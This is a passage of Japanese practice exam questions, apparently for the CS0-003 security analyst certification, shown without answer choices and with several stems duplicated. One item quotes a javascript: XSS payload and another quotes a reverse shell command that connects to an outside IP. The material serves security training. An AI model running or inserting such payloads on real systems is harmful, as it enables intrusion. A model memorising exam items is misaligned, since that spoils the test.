CS0-003 試験問題 46
クラウド チームは、未承認のリソースが自動プロビジョニングされているというアラートを受け取りました。調査の結果、チームは仮想通貨マイニングが行われていると疑っています。次の指標のうち、チームがこの結論に至る可能性が最も高いのはどれですか?
。
。
CS0-003 試験問題 47
セキュリティ アナリストは、同社の Web サイトで次の脆弱性を発見しました。
<INPUT TYPE="IMAGE" SRC="javascript:alert('test');">
今後この種の攻撃を防ぐには、次のうちどれを実装する必要がありますか?
<INPUT TYPE="IMAGE" SRC="javascript:alert('test');">
今後この種の攻撃を防ぐには、次のうちどれを実装する必要がありますか?
CS0-003 試験問題 48
セキュリティ アナリストは、次のコマンドを含むエクスプロイトの試みを検出しました。
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
次のうちどれが試みられていますか?
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
次のうちどれが試みられていますか?
CS0-003 試験問題 49
最近、セキュリティ アナリストは Arachni を使用して、新しく開発された Web アプリケーションの脆弱性評価を実行しました。アナリストは次の出力を懸念しています。
[+] XSS: フォームに「txtSearch」と入力し、アクション https://localhost/search.aspx を指定します。
[-] XSS: 応答 #1 を分析中...
[-] XSS: 応答 #2 を分析中...
[-] XSS: 応答 #3 を分析中...
[+] XSS: 応答が汚染されています。脆弱性の証拠を探しています。
この脆弱性の原因として最も考えられるのは次のうちどれですか?
[+] XSS: フォームに「txtSearch」と入力し、アクション https://localhost/search.aspx を指定します。
[-] XSS: 応答 #1 を分析中...
[-] XSS: 応答 #2 を分析中...
[-] XSS: 応答 #3 を分析中...
[+] XSS: 応答が汚染されています。脆弱性の証拠を探しています。
この脆弱性の原因として最も考えられるのは次のうちどれですか?
CS0-003 試験問題 50
SIEM、SOAR、チケット発行システムへの最近の投資を考慮すると、組織が重点を置くのに最適な指標は次のうちどれですか?
